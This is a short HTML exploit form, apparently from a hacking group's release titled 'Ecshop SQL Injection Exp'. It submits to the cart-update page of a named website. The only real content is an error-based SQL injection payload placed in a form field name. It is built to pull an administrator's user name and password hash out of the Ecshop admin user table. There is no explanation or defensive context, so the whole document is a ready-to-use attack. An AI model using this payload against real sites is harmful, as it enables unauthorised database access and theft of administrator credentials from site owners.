<FORM encType=multipart/form-data method=post name=myform action=http://www.mmmh.cn/flow.php?step=update_cart>  
<INPUT value=21aaa type=text name="goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1]">  
<INPUT value="Do it" type=submit><BR>  
Ecshop SQL Injection Exp [4 Fucker Team]  
</FORM> 